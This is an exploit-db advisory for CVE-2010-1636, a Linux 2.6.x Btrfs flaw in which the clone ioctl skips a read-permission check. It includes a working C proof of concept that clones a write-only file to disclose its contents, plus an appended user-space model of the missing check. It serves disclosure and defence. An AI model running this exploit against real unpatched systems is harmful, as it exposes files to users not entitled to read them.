Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass Vulnerability

2010-05-18T00:00:00
ID EDB-ID:34001
Type exploitdb
Reporter Dan Rosenberg
Modified 2010-05-18T00:00:00

Description

Linux Kernel 2.6.x Btrfs Cloned File Security Bypass Vulnerability. CVE-2010-1636. Local exploit for the Linux platform.

                                        
                                            source: http://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file that was opened only for writing, because the BTRFS_IOC_CLONE ioctl does not verify that the source descriptor permits reading. This may allow attackers to obtain sensitive data or launch further attacks.

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Clone ioctl number used by btrfs; the argument is the source fd. */
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

  if(argc < 3) {
    printf("Usage: %s [target] [output]\n", argv[0]);
    exit(-1);
  }

  /* Destination file on the btrfs volume that receives the cloned extents. */
  int output = open(argv[2], O_WRONLY | O_CREAT, 0644);
  if(output < 0) {
    perror("open output");
    exit(-1);
  }

  /* Note - opened for writing, not reading */
  int target = open(argv[1], O_WRONLY);
  if(target < 0) {
    perror("open target");
    exit(-1);
  }

  /* The vulnerable kernel never checks that `target` is readable. */
  if(ioctl(output, BTRFS_IOC_CLONE, target) < 0)
    perror("ioctl BTRFS_IOC_CLONE");

  close(target);
  close(output);
  return 0;
}
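The missing check, modelled in user space. This is an added example, not part of the exploit-db entry or the kernel's code: it shows the read-permission test the clone ioctl should apply to its source descriptor (a patched kernel performs the equivalent FMODE_READ check in the ioctl handler itself). The function names, the EINVAL choice and the temporary file path are assumptions for this example.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Same ioctl number as the proof of concept above. */
#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

/* Returns 1 if the descriptor's access mode permits reading, 0 if it
 * does not, -1 on error (e.g. an invalid descriptor). This is the
 * user-space equivalent of the kernel checking FMODE_READ on src. */
int fd_readable(int fd)
{
    int flags = fcntl(fd, F_GETFL);
    if (flags == -1)
        return -1;
    int mode = flags & O_ACCMODE;
    return (mode == O_RDONLY || mode == O_RDWR) ? 1 : 0;
}

/* Clone only when the caller could also read src through this descriptor.
 * Returns 0 on success, -1 with errno set otherwise. */
int guarded_clone(int dst, int src)
{
    int r = fd_readable(src);
    if (r == -1)
        return -1;           /* errno left as set by fcntl */
    if (r == 0) {
        errno = EINVAL;      /* reject: source not opened for reading (assumed errno) */
        return -1;
    }
    return ioctl(dst, BTRFS_IOC_CLONE, src);
}

/* Self-test helper: create a constructed temp file, reopen it with the
 * access mode `how`, and report what fd_readable() says about it. */
int readable_when_opened(int how)
{
    char path[] = "/tmp/clone-check-XXXXXX";  /* constructed temp name */
    int tmp = mkstemp(path);
    if (tmp == -1)
        return -1;
    close(tmp);
    int fd = open(path, how);
    int result = fd_readable(fd);
    if (fd != -1)
        close(fd);
    unlink(path);
    return result;
}
```

A descriptor opened O_WRONLY, as in the proof of concept, is rejected by guarded_clone() before any ioctl is issued.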